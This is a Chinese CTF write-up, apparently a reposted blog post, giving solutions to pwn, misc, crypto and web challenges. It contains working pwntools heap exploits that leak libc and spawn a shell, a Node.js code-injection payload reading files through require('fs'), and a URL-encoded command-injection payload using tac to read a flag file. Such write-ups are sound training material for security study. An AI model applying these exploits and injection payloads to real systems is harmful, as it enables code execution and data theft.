    # arbitrary-write pointer; the offsets are specific to this binary.
    edit(-27,'\x90')
    edit(-27,p64(0x88))
    edit(-12,p64(0x1800)+p64(0)*3+'\x88')
    # Assumes exactly 8 bytes of leaked pointer arrive first; a short read
    # would give a wrong base without any error.
    libc_base=u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
    success('libc_base:'+hex(libc_base))
    edit(-27,p64(libc_base+libc.sym['__free_hook'])+p64(0x68))
    # 0x4526a is a raw offset into this particular libc-2.23 build.
    edit(-10,p64(libc_base+0x4526a))
    add(0,0x68)
    dele(0)
    io.interactive()

 

Babyheap

 from pwn import*

context.log_level='debug'

 

def add(content):
    """Menu option 1 of the target: send *content* as the new entry."""
    io.sendlineafter("Your choice: ", '1')
    io.sendlineafter('content: ', content)

 

def dele(index):
    """Menu option 4 of the target: send the entry *index*."""
    io.sendlineafter("Your choice: ", '4')
    io.sendlineafter("index: ", str(index))

 

def edit(index, size, content):
    """Menu option 2 of the target: send *index*, *size* and then *content*."""
    io.sendlineafter("Your choice: ", '2')
    io.sendlineafter("index: ", str(index))
    io.sendlineafter('size: ', str(size))
    io.sendlineafter('content: ', content)

 

def show(index):
    """Menu option 3 of the target: send the entry *index* to display."""
    io.sendlineafter("Your choice: ", '3')
    io.sendlineafter("index: ", str(index))

 

if __name__ =="__main__":
    io=process('./baby_heap')
    elf=ELF('./baby_heap')
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

    add('a'*0x10)
    edit(0,0x18,'/bin/sh;'+'a'*0x10)
    show(0)
    io.recv(0x18)
    # Six leaked bytes padded to a full 8-byte word; assumes show() prints
    # the pointer right after 0x18 bytes of content.
    libc_base=u64(io.recv(6)+'\x00\x00')-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    edit(0,0x20,'/bin/sh\x00'+'a'*0x10+p64(libc_base+libc.sym['system']))
    show(0)

    #gdb.attach(io)
    #pause()
    io.interactive()

 

 

MISC:

抓猫猫

玩游戏就 get flag

 

亲爱的

可以分离一个压缩包,

然后 压缩包注释,

qmusic 2019.7.27 17:47

嗯,  亲爱的 热爱的  李现版的海阔天空

然后找到 这个时间点的评论 真的上头   解压 拿到flag

嗯 翻了好久的我

 

Hide secret

分离发现一个文件 但是 损坏  用010看 发现头部 像压缩包  但是是 0304  试着 加了补上50 4B  补上 压缩包的魔数 试了试 发现可以

binwalk 1.jpg后分离出1.txt

 

得到一串

最后发现是base92解密.。。

解密就得出flag

 

信号不好我先挂了

 

这个是是合并的watermark

直接分离后

 

 

 

数独  

 

是一个数独题目 一开始一直跑不出来,, 最后才知道 是这个题目少了一些限制,

 bfs 就可以做 =  =    =

直接bfs一把梭

import datetime
from pwn import *
import copy
context.log_level = 'DEBUG'
global sum          # no effect at module level; `sum` below shadows the builtin
l=[]                # l[k] = row*100+col of the k-th empty cell (filled in __main__)
list2 = []          # parsed puzzle, 0 for an empty cell
list3 = []          # working copy of list2 that dfs() fills in

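def pd(lens, v):
    """Return 1 if digit *v* may go into the *lens*-th empty cell, else 0.

    The cell is encoded in l[lens] as row*100+col. Only the row and the
    column are checked; the 3x3 box check stays disabled (the write-up says
    the challenge itself lacks some constraints).
    """
    # `//`: under Python 3 the original `/` produced a float index.
    row, col = l[lens] // 100, l[lens] % 100
    for i in range(9):
        if list3[i][col] == v or list3[row][i] == v:
            return 0
    # Disabled 3x3 box check, kept for reference:
    # x = (row // 3) * 3
    # y = (col // 3) * 3
    # for i in range(x, x + 3):
    #     for j in range(y, y + 3):
    #         if list3[i][j] == v:
    #             return 0
    return 1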

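def dfs(lens):
    """Fill the empty cells in order; once all `sum` are set, submit the grid.

    Rows are sent one at a time, each followed by a wait for the next
    'answer :' prompt (order reconstructed from the whitespace-stripped
    source), then the session is handed over interactively.
    """
    print(lens, sum)       # debug trace; was a Python 2 print statement
    #print l
    #print list3
    if lens == sum:
        for i in range(9):
            str_end = ''
            for j in range(9):
                if list2[i][j] == 0:
                    str_end += str(list3[i][j]) + (',')
            io.sendline(str_end[:-1])
            io.recvuntil('answer :\n')
        io.interactive()
        # Without this, the search kept going past the last empty cell
        # (l[sum] is 0, so it would start overwriting cell (0,0)).
        return
    cell = l[lens]
    row, col = cell // 100, cell % 100     # `//`: float index under Python 3
    for i in range(1, 10):
        if pd(lens, i) == 1:
            list3[row][col] = i
            dfs(lens + 1)
            list3[row][col] = 0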



if __name__ =="__main__":
    sum=0                       # number of empty cells; shadows the builtin
    for i in range(100):
        l.append(0)
    print l
    io=remote('101.71.29.5',10011)

    # The board is sent as 9 rows, each preceded by a separator line; cells
    # are split on '|' and the first/last fields dropped.
    io.recvuntil('commas.')
    list1 = io.recvline()
    for i in range(9):
        list1 = io.recvline()
        list1 = io.recvline()
        list1 = list1.strip().split('|')[1:10]
        list2.append(list1)

    #print list2

    for i in range(9):
        for j in range(9):
            if list2[i][j]=='' or list2[i][j]==' ':
                list2[i][j]=0
            else:
                list2[i][j] = int(list2[i][j])

    list3 = copy.deepcopy(list2)
    #print list3
    io.recvuntil('Please input row 1 answer :')
    for i in range(9):
        for j in range(9):
            if list3[i][j]==0:
                l[sum]=i*100+j      # row*100+col encoding read back by pd()/dfs()
                sum+=1

    dfs(0)

 

 

Crypto

 

不仅仅是rsa

 同一个q  求最大公因数就可以  = =  

from Crypto.Util.number import *

import gmpy2

import binascii

# Per the write-up, the two moduli share the factor q (found as their gcd);
# p1 and p2 are the remaining factors of n1 and n2 respectively.
p1=0xedbaab62d8b87c8f859dbea7981dc275fb080c66d4af11e2da21338133c8bfc1
q=0xd37984ec7c84c7a7e3326c0ef1ecc543abb78854f1c64927bc97ac4abcf1933b
p2=0xc5d721ad63a259550a062d26758e5a8a80135d07ee8b997ae608f131eb6234c9
e=41221
C1=4314251881242803343641258350847424240197348270934376293792054938860756265727535163218661012756264314717591117355736219880127534927494986120542485721347351
C2=485162209351525800948941613977942416744737316759516157292410960531475083863663017229882430859161458909478412418639172249660818299099618143918080867132349

n1=0xC461B3ED566F2D68583019170BDD5263D113BAECE3DEE6631F08A166376AC41FF5D4E90B3330E0FC26993E3B353F38F9B6B880DFBC5807636497561B7611047B
n2=0xA36E3A2A83FE2C1E33F285A08C3ECD36E377F4D9FFE828E2426D3ECED0A7F947631E932AEC327555511AC6D71E72686C1CB7DBBF3859A4D9A3D344FBF12A9553

# Standard RSA: d = e^-1 mod phi for each modulus, then m = C^d mod n.
phi=(p1-1)*(q-1)
d=gmpy2.invert(e,phi)
phi=(p2-1)*(q-1)
d2=gmpy2.invert(e,phi)
m=pow(C1,d,n1)
mm=pow(C2,d2,n2)
# The two plaintexts are concatenated as hex (leading '0x' stripped) and
# decoded to bytes. Python 2 script (print statement); a trailing 'L' from
# hex() of a long would break unhexlify — TODO confirm gmpy2 output here.
m=hex(m)
mm=hex(mm)
a=str(m)[2:]+str(mm)[2:]
print binascii.unhexlify(a)

 

一句话加密

这个n 在图像的最后

 

这个kobe 真的误导了我=  ==  让我一直以为  e是81,。

 

后来我发现这个题目的n是另一道题的n,,,那个题目的e是2.。。

然后我用RSAtools 试了一下。。

发现确实是。。。

ECC

这个题目一开始没有看出来是什么情况 , 然后搞得我很懵逼,,

# Challenge source (Sage). The `???????` values are the challenge's own
# redactions: the private scalar k, the AES key used as an x-coordinate,
# and the ephemeral r. Not runnable as given.
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
k=???????
K=k*G
#K=(2854873820564,9226233541419)

aes_key=???????
x=aes_key
M=E.lift_x(x)

r=?????????
C1=M+r*K
x1,y1=C1.xy()
C2=r*G
x2,y2=C2.xy()
print 'C1(%d,%d),C2(%d,%d)'%(x1,y1,x2,y2)

# output:
C1(6860981508506,1381088636252),C2(1935961385155,8353060610242)

后来  恶补了一波  但是原理还是有点懵b

但是最后还是安装了这个工具   看了题解  

直接用真的爽,

# Solution (Sage, Python 2 print syntax). The curve is small enough that
# Sage's discrete_log recovers k directly; M is then C1 - k*C2 and the AES
# key is M's x-coordinate, as in the challenge source above.
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
K=E(2854873820564,9226233541419)


k=G.discrete_log(K)

print 'k:%d'%(k)

C1=E(6860981508506,1381088636252)
C2=E(1935961385155,8353060610242)

M=C1-k*C2

aes_key,y=M.xy()

print 'aes_key:%d'%aes_key

print 'y:%d'%y

这个   运行出结果

跑出来key 之后就很简单了

直接运行脚本就出来了

from Crypto.Cipher import AES
import base64

# Key recovered in the ECC step, space-padded to the 16-byte AES block size.
key="1026".ljust(16,' ').encode("utf-8")
#print(ases)
#key = (ases.ljust(16,' '))
# ECB: the ciphertext below is exactly one 16-byte block (24 base64 chars),
# so no padding handling is involved; decrypt() returns raw bytes.
aes = AES.new(key,AES.MODE_ECB)


text_enc_b64 = base64.b64decode('/cM8Nx+iAidmt6RiqX8Vww==')
text_enc = aes.decrypt(text_enc_b64)
print(text_enc)

 

Web

帮赵总结婚

嗯,就是爆破  只要字典够大

Checkin

Nodejs注入 = =

查看

/calc require('fs').readdirSync('.').toString() 

读取

/calc  require('fs').readFileSync('a.js','utf-8')

Bypass

没有过滤tac

直接 /?a=./1.php%5c&b=%20%20%20%20%20%0a%20%20id%20%0a%20a=l%20%0a%20b=s%20%0a%20%20tac%20%20./.F1jh_/h3R3_1S_your_F1A9.txt%20%0a%5c

拿到flag

 

 

 

 

 

 



转载自blog.csdn.net/qq_41071646/article/details/102826291